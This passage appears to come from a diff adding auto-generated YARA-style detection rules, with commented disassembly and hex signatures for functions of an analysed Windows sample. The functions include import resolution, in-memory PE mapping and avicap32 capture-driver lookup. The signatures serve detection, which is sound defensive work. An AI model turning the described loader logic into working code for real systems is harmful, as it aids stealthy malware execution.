ebx,ebx + .text:0x00404184 0f849b000000 jz 0x00404225 + .text:0x0040418a 8b470c mov eax,dword [edi + 12] + .text:0x0040418d 8b5708 mov edx,dword [edi + 8] + .text:0x00404190 8d0c8504000000 lea ecx,dword [0x00000004 + eax * 4] + .text:0x00404197 51 push ecx + .text:0x00404198 52 push edx + .text:0x00404199 e8e63c0000 call 0x00407e84 ;msvcrt.realloc(0x61616161,0x85858588) + .text:0x0040419e 83c408 add esp,8 + .text:0x004041a1 894708 mov dword [edi + 8],eax + .text:0x004041a4 85c0 test eax,eax + .text:0x004041a6 747d jz 0x00404225 + .text:0x004041a8 8b4f0c mov ecx,dword [edi + 12] + .text:0x004041ab 891c88 mov dword [eax + ecx * 4],ebx + .text:0x004041ae 8b570c mov edx,dword [edi + 12] + .text:0x004041b1 42 inc edx + .text:0x004041b2 89570c mov dword [edi + 12],edx + .text:0x004041b5 8b06 mov eax,dword [esi] + .text:0x004041b7 85c0 test eax,eax + .text:0x004041b9 740a jz 0x004041c5 + .text:0x004041bb 8b7610 mov esi,dword [esi + 16] + .text:0x004041be 8d3c28 lea edi,dword [eax + ebp] + .text:0x004041c1 03f5 add esi,ebp + .text:0x004041c3 eb08 jmp 0x004041cd + .text:0x004041c5 loc_004041c5: [1 XREFS] + .text:0x004041c5 8b5610 mov edx,dword [esi + 16] + .text:0x004041c8 8d3c2a lea edi,dword [edx + ebp] + .text:0x004041cb 8bf7 mov esi,edi + .text:0x004041cd loc_004041cd: [1 XREFS] + .text:0x004041cd 8b07 mov eax,dword [edi] + .text:0x004041cf 85c0 test eax,eax + .text:0x004041d1 742d jz 0x00404200 + .text:0x004041d3 loc_004041d3: [1 XREFS] + .text:0x004041d3 a900000080 test eax,0x80000000 + .text:0x004041d8 7407 jz 0x004041e1 + .text:0x004041da 25ffff0000 and eax,0x0000ffff + .text:0x004041df eb04 jmp 0x004041e5 + .text:0x004041e1 loc_004041e1: [1 XREFS] + .text:0x004041e1 8d442802 lea eax,dword [eax + ebp + 2] + .text:0x004041e5 loc_004041e5: [1 XREFS] + .text:0x004041e5 50 push eax + .text:0x004041e6 53 push ebx + .text:0x004041e7 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(unknownlib,0xc2c2c2c4) + .text:0x004041ed 85c0 test eax,eax + .text:0x004041ef 8906 mov dword [esi],eax + .text:0x004041f1 7432 jz 0x00404225 + .text:0x004041f3 8b4704 mov eax,dword [edi + 4] + .text:0x004041f6 83c704 add edi,4 + .text:0x004041f9 83c604 add esi,4 + .text:0x004041fc 85c0 test eax,eax + .text:0x004041fe 75d3 jnz 0x004041d3 + .text:0x00404200 loc_00404200: [1 XREFS] + .text:0x00404200 8b442410 mov eax,dword [esp + 16] + .text:0x00404204 6a14 push 20 + .text:0x00404206 83c014 add eax,20 + .text:0x00404209 50 push eax + .text:0x0040420a 89442418 mov dword [esp + 24],eax + .text:0x0040420e ff15f0904000 call dword [0x004090f0] ;kernel32.IsBadReadPtr(0xc2c2c2d6,20) + .text:0x00404214 85c0 test eax,eax + .text:0x00404216 751d jnz 0x00404235 + .text:0x00404218 8b7c2418 mov edi,dword [esp + 24] + .text:0x0040421c 8b742410 mov esi,dword [esp + 16] + .text:0x00404220 e947ffffff jmp 0x0040416c + .text:0x00404225 loc_00404225: [3 XREFS] + .text:0x00404225 5f pop edi + .text:0x00404226 5e pop esi + .text:0x00404227 5d pop ebp + .text:0x00404228 33c0 xor eax,eax + .text:0x0040422a 5b pop ebx + .text:0x0040422b 59 pop ecx + .text:0x0040422c c3 ret + .text:0x0040422d loc_0040422d: [2 XREFS] + .text:0x0040422d 5f pop edi + .text:0x0040422e 5e pop esi + .text:0x0040422f 8bc3 mov eax,ebx + .text:0x00404231 5d pop ebp + .text:0x00404232 5b pop ebx + .text:0x00404233 59 pop ecx + .text:0x00404234 c3 ret + .text:0x00404235 loc_00404235: [2 XREFS] + .text:0x00404235 5f pop edi + .text:0x00404236 5e pop esi + .text:0x00404237 5d pop ebp + .text:0x00404238 b801000000 mov eax,1 + .text:0x0040423d 5b pop ebx + .text:0x0040423e 59 pop ecx + .text:0x0040423f c3 ret + */ + $c45 = { 51 53 55 56 57 8B 7C 24 ?? BB 01 00 00 00 8B 07 8B 6F ?? 05 80 00 00 00 8B 48 ?? 85 C9 0F 86 ?? ?? ?? ?? 8B 30 6A 14 03 F5 56 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 46 ?? 85 C0 0F 84 ?? ?? ?? ?? 03 C5 50 FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 47 ?? 8B 57 ?? 8D 0C 85 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 08 89 47 ?? 85 C0 74 ?? 8B 4F ?? 89 1C 88 8B 57 ?? 42 89 57 ?? 8B 06 85 C0 74 ?? 8B 76 ?? 8D 3C 28 03 F5 EB ?? 8B 56 ?? 8D 3C 2A 8B F7 8B 07 85 C0 74 ?? A9 00 00 00 80 74 ?? 25 FF FF 00 00 EB ?? 8D 44 28 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 89 06 74 ?? 8B 47 ?? 83 C7 04 83 C6 04 85 C0 75 ?? 8B 44 24 ?? 6A 14 83 C0 14 50 89 44 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 7C 24 ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B 59 C3 5F 5E 8B C3 5D 5B 59 C3 5F 5E 5D B8 01 00 00 00 5B 59 C3 } + /* +function at 0x00404e40@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - link function at runtime on Windows + - resolve function by parsing PE exports + .text:0x00404e40 + .text:0x00404e40 FUNC: int cdecl sub_00404e40( ) [2 XREFS] + .text:0x00404e40 + .text:0x00404e40 Stack Variables: (offset from initial top of stack) + .text:0x00404e40 -100: int local100 + .text:0x00404e40 -152: int local152 + .text:0x00404e40 -156: int local156 + .text:0x00404e40 -157: int local157 + .text:0x00404e40 -158: int local158 + .text:0x00404e40 -159: int local159 + .text:0x00404e40 -160: int local160 + .text:0x00404e40 -161: int local161 + .text:0x00404e40 -162: int local162 + .text:0x00404e40 -163: int local163 + .text:0x00404e40 -164: int local164 + .text:0x00404e40 -165: int local165 + .text:0x00404e40 -166: int local166 + .text:0x00404e40 -167: int local167 + .text:0x00404e40 -168: int local168 + .text:0x00404e40 -169: int local169 + .text:0x00404e40 -170: int local170 + .text:0x00404e40 -171: int local171 + .text:0x00404e40 -172: int local172 + .text:0x00404e40 -173: int local173 + .text:0x00404e40 -174: int local174 + .text:0x00404e40 -175: int local175 + .text:0x00404e40 -176: int local176 + .text:0x00404e40 -177: int local177 + .text:0x00404e40 -178: int local178 + .text:0x00404e40 -179: int local179 + .text:0x00404e40 -180: int local180 + .text:0x00404e40 -184: int local184 + .text:0x00404e40 -185: int local185 + .text:0x00404e40 -186: int local186 + .text:0x00404e40 -187: int local187 + .text:0x00404e40 -188: int local188 + .text:0x00404e40 -189: int local189 + .text:0x00404e40 -190: int local190 + .text:0x00404e40 -191: int local191 + .text:0x00404e40 -192: int local192 + .text:0x00404e40 -193: int local193 + .text:0x00404e40 -194: int local194 + .text:0x00404e40 -195: int local195 + .text:0x00404e40 -196: int local196 + .text:0x00404e40 + .text:0x00404e40 81ecc4000000 sub esp,196 + .text:0x00404e46 53 push ebx + .text:0x00404e47 55 push ebp + .text:0x00404e48 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00404e4e 56 push esi + .text:0x00404e4f b06c mov al,108 + .text:0x00404e51 57 push edi + .text:0x00404e52 33ff xor edi,edi + .text:0x00404e54 8844241a mov byte [esp + 26],al + .text:0x00404e58 8844241b mov byte [esp + 27],al + .text:0x00404e5c b341 mov bl,65 + .text:0x00404e5e b265 mov dl,101 + .text:0x00404e60 b172 mov cl,114 + .text:0x00404e62 b069 mov al,105 + .text:0x00404e64 57 push edi + .text:0x00404e65 885c2414 mov byte [esp + 20],bl + .text:0x00404e69 c644241556 mov byte [esp + 21],86 + .text:0x00404e6e c644241649 mov byte [esp + 22],73 + .text:0x00404e73 c644241743 mov byte [esp + 23],67 + .text:0x00404e78 885c2418 mov byte [esp + 24],bl + .text:0x00404e7c c644241950 mov byte [esp + 25],80 + .text:0x00404e81 c644241a33 mov byte [esp + 26],51 + .text:0x00404e86 c644241b32 mov byte [esp + 27],50 + .text:0x00404e8b c644241c2e mov byte [esp + 28],46 + .text:0x00404e90 c644241d64 mov byte [esp + 29],100 + .text:0x00404e95 c644242000 mov byte [esp + 32],0 + .text:0x00404e9a c644242463 mov byte [esp + 36],99 + .text:0x00404e9f c644242561 mov byte [esp + 37],97 + .text:0x00404ea4 c644242670 mov byte [esp + 38],112 + .text:0x00404ea9 c644242747 mov byte [esp + 39],71 + .text:0x00404eae 88542428 mov byte [esp + 40],dl + .text:0x00404eb2 c644242974 mov byte [esp + 41],116 + .text:0x00404eb7 c644242a44 mov byte [esp + 42],68 + .text:0x00404ebc 884c242b mov byte [esp + 43],cl + .text:0x00404ec0 8844242c mov byte [esp + 44],al + .text:0x00404ec4 c644242d76 mov byte [esp + 45],118 + .text:0x00404ec9 8854242e mov byte [esp + 46],dl + .text:0x00404ecd 884c242f mov byte [esp + 47],cl + .text:0x00404ed1 c644243044 mov byte [esp + 48],68 + .text:0x00404ed6 88542431 mov byte [esp + 49],dl + .text:0x00404eda c644243273 mov byte [esp + 50],115 + .text:0x00404edf c644243363 mov byte [esp + 51],99 + .text:0x00404ee4 884c2434 mov byte [esp + 52],cl + .text:0x00404ee8 88442435 mov byte [esp + 53],al + .text:0x00404eec c644243670 mov byte [esp + 54],112 + .text:0x00404ef1 c644243774 mov byte [esp + 55],116 + .text:0x00404ef6 88442438 mov byte [esp + 56],al + .text:0x00404efa c64424396f mov byte [esp + 57],111 + .text:0x00404eff c644243a6e mov byte [esp + 58],110 + .text:0x00404f04 885c243b mov byte [esp + 59],bl + .text:0x00404f08 c644243c00 mov byte [esp + 60],0 + .text:0x00404f0d ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f0f 8d442420 lea eax,dword [esp + 32] + .text:0x00404f13 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00404f17 50 push eax + .text:0x00404f18 51 push ecx + .text:0x00404f19 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local196) + .text:0x00404f1f 50 push eax + .text:0x00404f20 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(avicap32,local180) + .text:0x00404f26 8bd8 mov ebx,eax + .text:0x00404f28 33f6 xor esi,esi + .text:0x00404f2a loc_00404f2a: [1 XREFS] + .text:0x00404f2a 85ff test edi,edi + .text:0x00404f2c 751c jnz 0x00404f4a + .text:0x00404f2e 57 push edi + .text:0x00404f2f ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f31 8d54243c lea edx,dword [esp + 60] + .text:0x00404f35 6a32 push 50 + .text:0x00404f37 52 push edx + .text:0x00404f38 8d442478 lea eax,dword [esp + 120] + .text:0x00404f3c 6a64 push 100 + .text:0x00404f3e 50 push eax + .text:0x00404f3f 56 push esi + .text:0x00404f40 ffd3 call ebx ;UnknownApi() + .text:0x00404f42 46 inc esi + .text:0x00404f43 8bf8 mov edi,eax + .text:0x00404f45 83fe0a cmp esi,10 + .text:0x00404f48 7ce0 jl 0x00404f2a + .text:0x00404f4a loc_00404f4a: [1 XREFS] + .text:0x00404f4a 6a00 push 0 + .text:0x00404f4c ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00404f4e 8bc7 mov eax,edi + .text:0x00404f50 5f pop edi + .text:0x00404f51 5e pop esi + .text:0x00404f52 5d pop ebp + .text:0x00404f53 5b pop ebx + .text:0x00404f54 81c4c4000000 add esp,196 + .text:0x00404f5a c3 ret + */ + $c46 = { 81 EC C4 00 00 00 53 55 8B 2D ?? ?? ?? ?? 56 B0 6C 57 33 FF 88 44 24 ?? 88 44 24 ?? B3 41 B2 65 B1 72 B0 69 57 88 5C 24 ?? C6 44 24 ?? 56 C6 44 24 ?? 49 C6 44 24 ?? 43 88 5C 24 ?? C6 44 24 ?? 50 C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 00 C6 44 24 ?? 63 C6 44 24 ?? 61 C6 44 24 ?? 70 C6 44 24 ?? 47 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 44 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 76 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 44 88 54 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 63 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 74 88 44 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6E 88 5C 24 ?? C6 44 24 ?? 00 FF D5 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 33 F6 85 FF 75 ?? 57 FF D5 8D 54 24 ?? 6A 32 52 8D 44 24 ?? 6A 64 50 56 FF D3 46 8B F8 83 FE 0A 7C ?? 6A 00 FF D5 8B C7 5F 5E 5D 5B 81 C4 C4 00 00 00 C3 } + /* +function at 0x00403f20@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - enumerate PE sections + .text:0x00403f20 + .text:0x00403f20 FUNC: int cdecl sub_00403f20( int arg0, int arg1, int arg2, ) [2 XREFS] + .text:0x00403f20 + .text:0x00403f20 Stack Variables: (offset from initial top of stack) + .text:0x00403f20 12: int arg2 + .text:0x00403f20 8: int arg1 + .text:0x00403f20 4: int arg0 + .text:0x00403f20 -4: int local4 + .text:0x00403f20 + .text:0x00403f20 51 push ecx + .text:0x00403f21 8b442410 mov eax,dword [esp + 16] + .text:0x00403f25 55 push ebp + .text:0x00403f26 33c9 xor ecx,ecx + .text:0x00403f28 56 push esi + .text:0x00403f29 8b6804 mov ebp,dword [eax + 4] + .text:0x00403f2c 8b00 mov eax,dword [eax] + .text:0x00403f2e c744240800000000 mov dword [esp + 8],0 + .text:0x00403f36 668b4814 mov cx,word [eax + 20] + .text:0x00403f3a 6683780600 cmp word [eax + 6],0 + .text:0x00403f3f 8d740118 lea esi,dword [ecx + eax + 24] + .text:0x00403f43 0f8698000000 jbe 0x00403fe1 + .text:0x00403f49 53 push ebx + .text:0x00403f4a 57 push edi + .text:0x00403f4b 83c610 add esi,16 + .text:0x00403f4e loc_00403f4e: [1 XREFS] + .text:0x00403f4e 833e00 cmp dword [esi],0 + .text:0x00403f51 7538 jnz 0x00403f8b + .text:0x00403f53 8b54241c mov edx,dword [esp + 28] + .text:0x00403f57 8b5a38 mov ebx,dword [edx + 56] + .text:0x00403f5a 85db test ebx,ebx + .text:0x00403f5c 7e61 jle 0x00403fbf + .text:0x00403f5e 8b46fc mov eax,dword [esi - 4] + .text:0x00403f61 6a04 push 4 + .text:0x00403f63 6800100000 push 0x00001000 + .text:0x00403f68 03c5 add eax,ebp + .text:0x00403f6a 53 push ebx + .text:0x00403f6b 50 push eax + .text:0x00403f6c ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4) + .text:0x00403f72 8bcb mov ecx,ebx + .text:0x00403f74 8bf8 mov edi,eax + .text:0x00403f76 8bd1 mov edx,ecx + .text:0x00403f78 33c0 xor eax,eax + .text:0x00403f7a c1e902 shr ecx,2 + .text:0x00403f7d 897ef8 mov dword [esi - 8],edi + .text:0x00403f80 f3ab rep: stosd + .text:0x00403f82 8bca mov ecx,edx + .text:0x00403f84 83e103 and ecx,3 + .text:0x00403f87 f3aa rep: stosb + .text:0x00403f89 eb34 jmp 0x00403fbf + .text:0x00403f8b loc_00403f8b: [1 XREFS] + .text:0x00403f8b 8b4efc mov ecx,dword [esi - 4] + .text:0x00403f8e 8b06 mov eax,dword [esi] + .text:0x00403f90 6a04 push 4 + .text:0x00403f92 6800100000 push 0x00001000 + .text:0x00403f97 03cd add ecx,ebp + .text:0x00403f99 50 push eax + .text:0x00403f9a 51 push ecx + .text:0x00403f9b ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4) + .text:0x00403fa1 8b16 mov edx,dword [esi] + .text:0x00403fa3 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00403fa9 8bf8 mov edi,eax + .text:0x00403fab 8b4604 mov eax,dword [esi + 4] + .text:0x00403fae 52 push edx + .text:0x00403faf 8b54241c mov edx,dword [esp + 28] + .text:0x00403fb3 03c2 add eax,edx + .text:0x00403fb5 50 push eax + .text:0x00403fb6 57 push edi + .text:0x00403fb7 e8a4050000 call 0x00404560 ;sub_00404560(kernel32.VirtualAlloc(0xc2c2c2c2,0x61616161,0x00001000,4),0xa2b87170,0x61616161) + .text:0x00403fbc 897ef8 mov dword [esi - 8],edi + .text:0x00403fbf loc_00403fbf: [2 XREFS] + .text:0x00403fbf 8b4c2420 mov ecx,dword [esp + 32] + .text:0x00403fc3 8b442410 mov eax,dword [esp + 16] + .text:0x00403fc7 40 inc eax + .text:0x00403fc8 83c628 add esi,40 + .text:0x00403fcb 8b11 mov edx,dword [ecx] + .text:0x00403fcd 33c9 xor ecx,ecx + .text:0x00403fcf 89442410 mov dword [esp + 16],eax + .text:0x00403fd3 668b4a06 mov cx,word [edx + 6] + .text:0x00403fd7 3bc1 cmp eax,ecx + .text:0x00403fd9 0f8c6fffffff jl 0x00403f4e + .text:0x00403fdf 5f pop edi + .text:0x00403fe0 5b pop ebx + .text:0x00403fe1 loc_00403fe1: [1 XREFS] + .text:0x00403fe1 5e pop esi + .text:0x00403fe2 5d pop ebp + .text:0x00403fe3 59 pop ecx + .text:0x00403fe4 c3 ret + */ + $c47 = { 51 8B 44 24 ?? 55 33 C9 56 8B 68 ?? 8B 00 C7 44 24 ?? 00 00 00 00 66 8B 48 ?? 66 83 78 ?? 00 8D 74 01 ?? 0F 86 ?? ?? ?? ?? 53 57 83 C6 10 83 3E 00 75 ?? 8B 54 24 ?? 8B 5A ?? 85 DB 7E ?? 8B 46 ?? 6A 04 68 00 10 00 00 03 C5 53 50 FF 15 ?? ?? ?? ?? 8B CB 8B F8 8B D1 33 C0 C1 E9 02 89 7E ?? F3 AB 8B CA 83 E1 03 F3 AA EB ?? 8B 4E ?? 8B 06 6A 04 68 00 10 00 00 03 CD 50 51 FF 15 ?? ?? ?? ?? 8B 16 8B 0D ?? ?? ?? ?? 8B F8 8B 46 ?? 52 8B 54 24 ?? 03 C2 50 57 E8 ?? ?? ?? ?? 89 7E ?? 8B 4C 24 ?? 8B 44 24 ?? 40 83 C6 28 8B 11 33 C9 89 44 24 ?? 66 8B 4A ?? 3B C1 0F 8C ?? ?? ?? ?? 5F 5B 5E 5D 59 C3 } + /* +function at 0x00403ff0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - enumerate PE sections + .text:0x00403ff0 + .text:0x00403ff0 FUNC: int cdecl sub_00403ff0( int arg0, ) [2 XREFS] + .text:0x00403ff0 + .text:0x00403ff0 Stack Variables: (offset from initial top of stack) + .text:0x00403ff0 4: int arg0 + .text:0x00403ff0 -4: int local4 + .text:0x00403ff0 + .text:0x00403ff0 51 push ecx + .text:0x00403ff1 8b442408 mov eax,dword [esp + 8] + .text:0x00403ff5 53 push ebx + .text:0x00403ff6 33c9 xor ecx,ecx + .text:0x00403ff8 55 push ebp + .text:0x00403ff9 8b18 mov ebx,dword [eax] + .text:0x00403ffb 33ed xor ebp,ebp + .text:0x00403ffd 668b4b14 mov cx,word [ebx + 20] + .text:0x00404001 66396b06 cmp word [ebx + 6],bp + .text:0x00404005 8d441918 lea eax,dword [ecx + ebx + 24] + .text:0x00404009 0f8695000000 jbe 0x004040a4 + .text:0x0040400f 56 push esi + .text:0x00404010 57 push edi + .text:0x00404011 8d7824 lea edi,dword [eax + 36] + .text:0x00404014 loc_00404014: [1 XREFS] + .text:0x00404014 8b07 mov eax,dword [edi] + .text:0x00404016 8bc8 mov ecx,eax + .text:0x00404018 8bd0 mov edx,eax + .text:0x0040401a c1e91d shr ecx,29 + .text:0x0040401d c1ea1e shr edx,30 + .text:0x00404020 8bf0 mov esi,eax + .text:0x00404022 83e101 and ecx,1 + .text:0x00404025 83e201 and edx,1 + .text:0x00404028 c1ee1f shr esi,31 + .text:0x0040402b a900000002 test eax,0x02000000 + .text:0x00404030 7415 jz 0x00404047 + .text:0x00404032 8b57ec mov edx,dword [edi - 20] + .text:0x00404035 8b47e4 mov eax,dword [edi - 28] + .text:0x00404038 6800400000 push 0x00004000 + .text:0x0040403d 52 push edx + .text:0x0040403e 50 push eax + .text:0x0040403f ff1570904000 call dword [0x00409070] ;kernel32.VirtualFree(0x61616161,0x61616161,0x00004000) + .text:0x00404045 eb43 jmp 0x0040408a + .text:0x00404047 loc_00404047: [1 XREFS] + .text:0x00404047 8d0c4a lea ecx,dword [edx + ecx * 2] + .text:0x0040404a a900000004 test eax,0x04000000 + .text:0x0040404f 8d144e lea edx,dword [esi + ecx * 2] + .text:0x00404052 8b149550a04000 mov edx,dword [0x0040a050 + edx * 4] + .text:0x00404059 7403 jz 0x0040405e + .text:0x0040405b 80ce02 or dh,2 + .text:0x0040405e loc_0040405e: [1 XREFS] + .text:0x0040405e 8b4fec mov ecx,dword [edi - 20] + .text:0x00404061 85c9 test ecx,ecx + .text:0x00404063 7512 jnz 0x00404077 + .text:0x00404065 a840 test al,64 + .text:0x00404067 7405 jz 0x0040406e + .text:0x00404069 8b4b20 mov ecx,dword [ebx + 32] + .text:0x0040406c eb07 jmp 0x00404075 + .text:0x0040406e loc_0040406e: [1 XREFS] + .text:0x0040406e a880 test al,128 + .text:0x00404070 7418 jz 0x0040408a + .text:0x00404072 8b4b24 mov ecx,dword [ebx + 36] + .text:0x00404075 loc_00404075: [1 XREFS] + .text:0x00404075 85c9 test ecx,ecx + .text:0x00404077 loc_00404077: [1 XREFS] + .text:0x00404077 7611 jbe 0x0040408a + .text:0x00404079 8d442410 lea eax,dword [esp + 16] + .text:0x0040407d 50 push eax + .text:0x0040407e 52 push edx + .text:0x0040407f 51 push ecx + .text:0x00404080 8b4fe4 mov ecx,dword [edi - 28] + .text:0x00404083 51 push ecx + .text:0x00404084 ff15e4904000 call dword [0x004090e4] ;kernel32.VirtualProtect(0x61616161,0x61616161,32,local4) + .text:0x0040408a loc_0040408a: [3 XREFS] + .text:0x0040408a 8b542418 mov edx,dword [esp + 24] + .text:0x0040408e 33c0 xor eax,eax + .text:0x00404090 45 inc ebp + .text:0x00404091 83c728 add edi,40 + .text:0x00404094 8b1a mov ebx,dword [edx] + .text:0x00404096 668b4306 mov ax,word [ebx + 6] + .text:0x0040409a 3be8 cmp ebp,eax + .text:0x0040409c 0f8c72ffffff jl 0x00404014 + .text:0x004040a2 5f pop edi + .text:0x004040a3 5e pop esi + .text:0x004040a4 loc_004040a4: [1 XREFS] + .text:0x004040a4 5d pop ebp + .text:0x004040a5 5b pop ebx + .text:0x004040a6 59 pop ecx + .text:0x004040a7 c3 ret + */ + $c48 = { 51 8B 44 24 ?? 53 33 C9 55 8B 18 33 ED 66 8B 4B ?? 66 39 6B ?? 8D 44 19 ?? 0F 86 ?? ?? ?? ?? 56 57 8D 78 ?? 8B 07 8B C8 8B D0 C1 E9 1D C1 EA 1E 8B F0 83 E1 01 83 E2 01 C1 EE 1F A9 00 00 00 02 74 ?? 8B 57 ?? 8B 47 ?? 68 00 40 00 00 52 50 FF 15 ?? ?? ?? ?? EB ?? 8D 0C 4A A9 00 00 00 04 8D 14 4E 8B 14 95 ?? ?? ?? ?? 74 ?? 80 CE 02 8B 4F ?? 85 C9 75 ?? A8 40 74 ?? 8B 4B ?? EB ?? A8 80 74 ?? 8B 4B ?? 85 C9 76 ?? 8D 44 24 ?? 50 52 51 8B 4F ?? 51 FF 15 ?? ?? ?? ?? 8B 54 24 ?? 33 C0 45 83 C7 28 8B 1A 66 8B 43 ?? 3B E8 0F 8C ?? ?? ?? ?? 5F 5E 5D 5B 59 C3 } + /* +function at 0x00403dd0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - parse PE header + .text:0x00403dd0 + .text:0x00403dd0 FUNC: int cdecl sub_00403dd0( int arg0, ) [2 XREFS] + .text:0x00403dd0 + .text:0x00403dd0 Stack Variables: (offset from initial top of stack) + .text:0x00403dd0 4: int arg0 + .text:0x00403dd0 + .text:0x00403dd0 53 push ebx + .text:0x00403dd1 55 push ebp + .text:0x00403dd2 8b6c240c mov ebp,dword [esp + 12] + .text:0x00403dd6 56 push esi + .text:0x00403dd7 57 push edi + .text:0x00403dd8 c645004d mov byte [ebp],77 + .text:0x00403ddc c645015a mov byte [ebp + 1],90 + .text:0x00403de0 66817d004d5a cmp word [ebp],0x00005a4d + .text:0x00403de6 7407 jz 0x00403def + .text:0x00403de8 5f pop edi + .text:0x00403de9 5e pop esi + .text:0x00403dea 5d pop ebp + .text:0x00403deb 33c0 xor eax,eax + .text:0x00403ded 5b pop ebx + .text:0x00403dee c3 ret + .text:0x00403def loc_00403def: [1 XREFS] + .text:0x00403def 8b5d3c mov ebx,dword [ebp + 60] + .text:0x00403df2 03dd add ebx,ebp + .text:0x00403df4 813b50450000 cmp dword [ebx],0x00004550 + .text:0x00403dfa 7407 jz 0x00403e03 + .text:0x00403dfc 5f pop edi + .text:0x00403dfd 5e pop esi + .text:0x00403dfe 5d pop ebp + .text:0x00403dff 33c0 xor eax,eax + .text:0x00403e01 5b pop ebx + .text:0x00403e02 c3 ret + .text:0x00403e03 loc_00403e03: [1 XREFS] + .text:0x00403e03 8b4350 mov eax,dword [ebx + 80] + .text:0x00403e06 8b4b34 mov ecx,dword [ebx + 52] + .text:0x00403e09 8b3580904000 mov esi,dword [0x00409080] + .text:0x00403e0f 6a04 push 4 + .text:0x00403e11 6800200000 push 0x00002000 + .text:0x00403e16 50 push eax + .text:0x00403e17 51 push ecx + .text:0x00403e18 ffd6 call esi ;kernel32.VirtualAlloc(0x61616161,0x61616161,0x00002000,4) + .text:0x00403e1a 8bf8 mov edi,eax + .text:0x00403e1c 85ff test edi,edi + .text:0x00403e1e 7519 jnz 0x00403e39 + .text:0x00403e20 8b5350 mov edx,dword [ebx + 80] + .text:0x00403e23 6a04 push 4 + .text:0x00403e25 6800200000 push 0x00002000 + .text:0x00403e2a 52 push edx + .text:0x00403e2b 50 push eax + .text:0x00403e2c ffd6 call esi ;kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00002000,4) + .text:0x00403e2e 8bf8 mov edi,eax + .text:0x00403e30 85ff test edi,edi + .text:0x00403e32 7505 jnz 0x00403e39 + .text:0x00403e34 5f pop edi + .text:0x00403e35 5e pop esi + .text:0x00403e36 5d pop ebp + .text:0x00403e37 5b pop ebx + .text:0x00403e38 c3 ret + .text:0x00403e39 loc_00403e39: [2 XREFS] + .text:0x00403e39 6a14 push 20 + .text:0x00403e3b 6a00 push 0 + .text:0x00403e3d ff15e0904000 call dword [0x004090e0] ;kernel32.GetProcessHeap() + .text:0x00403e43 50 push eax + .text:0x00403e44 ff15dc904000 call dword [0x004090dc] ;ntdll.RtlAllocateHeap(kernel32.GetProcessHeap(),0,20) + .text:0x00403e4a 8bf0 mov esi,eax + .text:0x00403e4c 33c0 xor eax,eax + .text:0x00403e4e 6a04 push 4 + .text:0x00403e50 6800100000 push 0x00001000 + .text:0x00403e55 897e04 mov dword [esi + 4],edi + .text:0x00403e58 89460c mov dword [esi + 12],eax + .text:0x00403e5b 894608 mov dword [esi + 8],eax + .text:0x00403e5e 894610 mov dword [esi + 16],eax + .text:0x00403e61 8b4350 mov eax,dword [ebx + 80] + .text:0x00403e64 50 push eax + .text:0x00403e65 57 push edi + .text:0x00403e66 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(kernel32.VirtualAlloc(0x61616161,0x61616161,0x00002000,4),0x61616161,0x00001000,4) + .text:0x00403e6c 8b4b54 mov ecx,dword [ebx + 84] + .text:0x00403e6f 6a04 push 4 + .text:0x00403e71 6800100000 push 0x00001000 + .text:0x00403e76 51 push ecx + .text:0x00403e77 57 push edi + .text:0x00403e78 ff1580904000 call dword [0x00409080] ;kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00001000,4) + .text:0x00403e7e 8b553c mov edx,dword [ebp + 60] + .text:0x00403e81 8b4b54 mov ecx,dword [ebx + 84] + .text:0x00403e84 03d1 add edx,ecx + .text:0x00403e86 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00403e8c 52 push edx + .text:0x00403e8d 55 push ebp + .text:0x00403e8e 50 push eax + .text:0x00403e8f 89442420 mov dword [esp + 32],eax + .text:0x00403e93 e8c8060000 call 0x00404560 ;sub_00404560(kernel32.VirtualAlloc(<0x00403e18>,0x61616161,0x00001000,4),arg0,0xc2c2c2c2) + .text:0x00403e98 8b453c mov eax,dword [ebp + 60] + .text:0x00403e9b 8b4c2414 mov ecx,dword [esp + 20] + .text:0x00403e9f 03c1 add eax,ecx + .text:0x00403ea1 56 push esi + .text:0x00403ea2 53 push ebx + .text:0x00403ea3 8906 mov dword [esi],eax + .text:0x00403ea5 55 push ebp + .text:0x00403ea6 897834 mov dword [eax + 52],edi + .text:0x00403ea9 e872000000 call 0x00403f20 ;sub_00403f20(arg0,0xa2b87170,kernel32.HeapAlloc(<0x00403e3d>,0,20)) + .text:0x00403eae 8b4b34 mov ecx,dword [ebx + 52] + .text:0x00403eb1 8bc7 mov eax,edi + .text:0x00403eb3 83c40c add esp,12 + 